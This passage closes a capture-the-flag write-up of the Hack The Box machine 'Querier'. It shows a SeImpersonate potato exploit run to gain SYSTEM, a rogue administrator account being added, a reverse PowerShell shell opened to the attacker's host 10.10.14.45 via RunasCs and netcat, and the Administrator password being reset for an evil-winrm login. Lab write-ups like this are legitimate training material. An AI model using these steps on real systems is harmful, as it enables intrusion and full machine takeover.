01/29/2019 01:04 AM <DIR> ..
05/24/2024 03:29 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,463,217,152 bytes free

C:\Users\Administrator\Desktop> type root.txt
df1686fcc228e6ed71a3dbe34cbcdb16

C:\Users\Administrator\Desktop>

20. The password was clearly correct, but crackmapexec kept reporting it as wrong; I started to wonder whether my copy of the tool was broken....

21. An additional privilege-escalation method:

PS C:\Users\mssql-svc\Desktop> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\g.exe .
copy \\10.10.14.45\share\g.exe .
PS C:\Users\mssql-svc\Desktop> ls
ls


Directory: C:\Users\mssql-svc\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/20/2024 8:29 AM 57344 g.exe
-a---- 5/13/2005 10:53 AM 68608 nc.exe
-a---- 4/20/2024 8:29 AM 600580 PowerUp.ps1
-ar--- 5/24/2024 3:29 AM 34 user.txt


PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd "cmd /c whoami"
./g.exe -cmd "cmd /c whoami"
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\5cd7af1f-e64d-439b-9af3-0c4f172010ef\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000d802-0278-ffff-b945-6c415b89088b
[*] DCOM obj OXID: 0xf71bcf9b480c2046
[*] DCOM obj OID: 0x66361540824072e4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4020
nt authority\system
PS C:\Users\mssql-svc\Desktop>

corporate568

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd "cmd /c net user shiyan corporate568 /add"
./g.exe -cmd "cmd /c net user shiyan corporate568 /add"
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ed388708-817d-44aa-ba0d-0b9eb1eef47a\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00009402-0378-ffff-bf32-135736469f18
[*] DCOM obj OXID: 0x5c60203ea3d18e7f
[*] DCOM obj OID: 0xf85be75c42c30d4b
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3832
The command completed successfully.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> ./g.exe -cmd 'cmd /c net localgroup "Administrators" shiyan /add'
./g.exe -cmd 'cmd /c net localgroup "Administrators" shiyan /add'
[*] CombaseModule: 0x140720895819776
[*] DispatchTable: 0x140720898133200
[*] UseProtseqFunction: 0x140720897511520
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\ba650299-29f0-4b60-8b4c-defe1ac0f86e\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000c02-062c-ffff-e18c-0234d365828b
[*] DCOM obj OXID: 0x9c24b217fdad8f24
[*] DCOM obj OID: 0x1e3bc132b669cfc2
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 856 Token:0x796 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2116
The command completed successfully.

PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> copy \\10.10.14.45\share\RunasCs.exe .\r.exe
copy \\10.10.14.45\share\RunasCs.exe .\r.exe
PS C:\Users\mssql-svc\Desktop> ls
ls


Directory: C:\Users\mssql-svc\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/20/2024 8:29 AM 57344 g.exe
-a---- 5/13/2005 10:53 AM 68608 nc.exe
-a---- 4/20/2024 8:29 AM 600580 PowerUp.ps1
-a---- 5/19/2023 5:37 PM 51712 r.exe
-ar--- 5/24/2024 3:29 AM 34 user.txt


PS C:\Users\mssql-svc\Desktop>

PS C:\Users\mssql-svc\Desktop> .\r.exe shiyan corporate568 powershell -r 10.10.14.45:4444 -l 3
.\r.exe shiyan corporate568 powershell -r 10.10.14.45:4444 -l 3
[*] Warning: User profile directory for user shiyan does not exists. Use --force-profile if you want to force the creation.

[+] Running in session 0 with process function CreateProcessAsUserW()
[+] Using Station\Desktop: Service-0x0-2177b$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 4020 created in background.
PS C:\Users\mssql-svc\Desktop>

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.125] 49703
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\System32> whoami
whoami
querier\shiyan
PS C:\Windows\System32> cd C:/Users/Administrator/Desktop
cd C:/Users/Administrator/Desktop
PS C:\Users\Administrator\Desktop> ls
ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/24/2024 3:29 AM 34 root.txt


PS C:\Users\Administrator\Desktop> cat root.txt
cat root.txt
df1686fcc228e6ed71a3dbe34cbcdb16
PS C:\Users\Administrator\Desktop>

PS C:\Users\Administrator\Desktop> net user Administrator corporate568
net user Administrator corporate568
The command completed successfully.

PS C:\Users\Administrator\Desktop>

Change the password and log in directly:

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.125 -u administrator -p 'corporate568'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Perfect~

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/175


Querier-htb-writeup
https://sh1yan.top/2024/05/25/Querier-htb-writeup/
Author: shiyan
Published: 25 May 2024